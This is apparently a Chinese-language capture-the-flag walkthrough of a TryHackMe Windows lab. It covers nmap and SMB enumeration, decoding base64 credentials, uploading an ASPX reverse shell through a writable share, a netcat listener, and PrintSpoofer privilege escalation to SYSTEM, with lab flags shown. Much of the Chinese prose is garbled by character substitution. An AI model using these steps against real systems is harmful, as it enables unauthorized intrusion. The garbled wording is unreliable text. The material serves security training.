服务发现
┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.150.167 -p- 255 ⨯Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 04:20 EDTNmap scan report for 10.10.150.167Host is up (0.32s latency).Not shown: 65527 filtered portsPORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds3389/tcp open ms-wbt-server Microsoft Terminal Services49663/tcp open http Microsoft IIS httpd 10.049667/tcp open msrpc Microsoft Windows RPC49669/tcp open msrpc Microsoft Windows RPCService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 448.90 seconds
剖析
80和49663都开启了http服务,目录爆破没有发现什么乏味的货色
445貌似存在永恒之蓝破绽,然而没有攻打胜利
samba 枚举,提醒在\10.10.150.167\nt4wrksv 里有一个passwords.txt文件
┌──(rootkali)-[~/tryhackme]└─# nmap --script "safe or smb-enum-*" -p 445 10.10.207.135 > smb.txtsmb-enum-shares: | account_used: guest| \\10.10.150.167\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN| Comment: Remote Admin| Anonymous access: <none>| Current user access: <none>| \\10.10.150.167\C$: | Type: STYPE_DISKTREE_HIDDEN| Comment: Default share| Anonymous access: <none>| Current user access: <none>| \\10.10.150.167\IPC$: | Type: STYPE_IPC_HIDDEN| Comment: Remote IPC| Anonymous access: <none>| Current user access: READ/WRITE| \\10.10.150.167\nt4wrksv: | Type: STYPE_DISKTREE| Comment: | Anonymous access: <none>|_ Current user access: READ/WRITE| smb-ls: Volume \\10.10.150.167\nt4wrksv| SIZE TIME FILENAME| <DIR> 2020-07-25T15:10:05 .| <DIR> 2020-07-25T15:10:05 ..| 98 2020-07-25T15:13:05 passwords.txt|_
匿名连贯//10.10.150.167/nt4wrksv ,下载passwords.txt文件
──(rootkali)-[~]└─# smbclient //10.10.150.167/nt4wrksv 1 ⨯Enter WORKGROUP\root's password: Try "help" to get a list of possible commands.smb: \> ls . D 0 Wed Sep 8 06:09:40 2021 .. D 0 Wed Sep 8 06:09:40 2021 passwords.txt A 98 Sat Jul 25 11:15:33 2020 7735807 blocks of size 4096. 5137057 blocks availablesmb: \> get passwords.txtgetting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)smb: \> ^C
本地关上passwords.txt文件,是一个加密的用户账号密码
┌──(rootkali)-[~]└─# cat passwords.txt [User Passwords - Encoded]Qm9iIC0gIVBAJCRXMHJEITEyMw==QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
看开端有两个==号,猜想是base64加密,放到hackbar里解密
加密串:Qm9iIC0gIVBAJCRXMHJEITEyMw== 解密:Bob - !P@$$W0rD!123加密串:QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk 解密:Bill - Juw4nnaM4n420696969!$$$
所以这两个是什么服务的账号密码?
因为开了3389端口,认为是近程连贯的账号,尝试连贯,然而都失败了
然而关上http://10.10.150.167:49663/nt...,同样能够拜访到下面的信息,阐明分享的目录在iss能够拜访的目录内,也就是说能够通过上传一个asp文件,拿到反弹的shell
胜利上传一个asp文件,payload见:https://github.com/borjmz/asp...
┌──(rootkali)-[~]└─# smbclient //10.10.150.167/nt4wrksv Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. smb: \> put /root/tryhackme/revreverse_shell.apsx revse_shell.php smb: \> put /root/tryhackme/reverse_shell.apsx ./shell.aspxputting file /root/tryhackme/reverse_shell.apsx as \shell.aspx (11.7 kb/s) (average 11.7 kb/s)smb: \> ls . D 0 Thu Sep 9 04:33:54 2021 .. D 0 Thu Sep 9 04:33:54 2021 passwords.txt A 98 Sat Jul 25 11:15:33 2020 shell.aspx A 15492 Thu Sep 9 04:33:55 2021 7735807 blocks of size 4096. 5134626 blocks availablesmb: \>
拜访http://10.10.150.167:49663/nt...,拿到一个反弹shell
┌──(rootkali)-[~/tryhackme]└─# nc -lnvp 1234 130 ⨯listening on [any] 1234 ...connect to [10.13.21.169] from (UNKNOWN) [10.10.150.167] 49893Spawn Shell...Microsoft Windows [Version 10.0.14393](c) 2016 Microsoft Corporation. All rights reserved.c:\windows\system32\inetsrv>whoamiwhoamiiis apppool\defaultapppoolc:\windows\system32\inetsrv>
拿到userflag
c:\Users\Bob\Desktop>type user.txttype user.txtTHM{fdk4ka34vk346ksxfr21tg789ktf45}
运行whoami /priv查看以后用户在零碎中的权限
PS C:\inetpub\wwwroot\nt4wrksv> whoami /privwhoami /privPRIVILEGES INFORMATION----------------------Privilege Name Description State ============================= ========================================= ========SeAssignPrimaryTokenPrivilege Replace a process level token DisabledSeIncreaseQuotaPrivilege Adjust memory quotas for a process DisabledSeAuditPrivilege Generate security audits DisabledSeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
以后用户启用了SeImpersonatePrivilege,意味着能够利用令牌模仿来晋升权限
从https://github.com/itm4n/Prin...下载64位的PrintSpoofer64.exe,而后通过smb上传到windows靶机
提权
PS C:\inetpub\wwwroot\nt4wrksv> .\PrintSpoofer64.exe -i -c cmd.\PrintSpoofer64.exe -i -c cmd[+] Found privilege: SeImpersonatePrivilege[+] Named pipe listening...[+] CreateProcessAsUser() OKMicrosoft Windows [Version 10.0.14393](c) 2016 Microsoft Corporation. All rights reserved.C:\Windows\system32>whoamiwhoamint authority\system
拿到root flag
PS C:\users\administrator\desktop> type root.txttype root.txtTHM{1fk5kf469devly1gl320zafgl345pv}PS C:\users\administrator\desktop>